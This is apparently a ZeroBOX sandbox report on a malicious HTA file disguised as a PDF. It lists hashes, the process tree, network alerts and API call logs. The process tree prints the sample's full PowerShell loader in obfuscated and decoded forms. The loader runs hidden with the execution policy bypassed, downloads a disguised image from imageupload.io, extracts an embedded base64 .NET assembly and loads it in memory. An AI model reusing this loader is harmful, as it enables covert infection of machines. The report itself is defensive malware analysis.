Summary | ZeroBOX

XLARFQ77802578790.pdf.hta

Generic Malware Antivirus AntiDebug MSOffice File AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Oct. 31, 2023, 5:43 p.m. Oct. 31, 2023, 5:45 p.m.
Size 112.9KB
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 9f5447784eb960df0833273eded3324c
SHA256 2da026ec237903e5de38b8f9f37183229db7601933ad5e1f247a8f73a3cbf2cb
CRC32 DE304A32
ssdeep 768:iNMAbaHvu4Sc1kLIWIqKsVsfscsNsWsysasUs4sLsrsFsHsusVsvsMsTs4sKsksa:iGAX4Dt7pp95
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\XLARFQ77802578790.pdf.hta.html

    3068
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409

      1776
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        1720
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

          2964

Name Response Post-Analysis Lookup
imageupload.io 104.21.83.102
IP Address Status Action
104.21.83.102 Active Moloch
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49175 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49178 -> 104.21.83.102:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49174 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49176 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49178
104.21.83.102:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=imageupload.io b1:21:d8:81:60:0d:67:7c:14:72:94:30:ff:a0:2d:d7:b8:50:dd:46

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x0000000000000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000030b0d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b359d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b359d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b359d20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373830
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373830
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373910
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373910
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373910
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373910
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b373c90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374160
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374160
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374160
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3741d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374400
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374400
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b374390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39f070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39f070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39f070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39f070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39fb60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39fb60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000037afa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e9760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e9760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5e9760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6590
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f6670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 111928176
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 111934128
registers.r11: 111929936
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1905685317
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3068
region_size: 2428928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002fd0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3068
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003220000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3068
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef69c9000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3068
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feeccc9000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1776
region_size: 9179136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000027c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003080000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
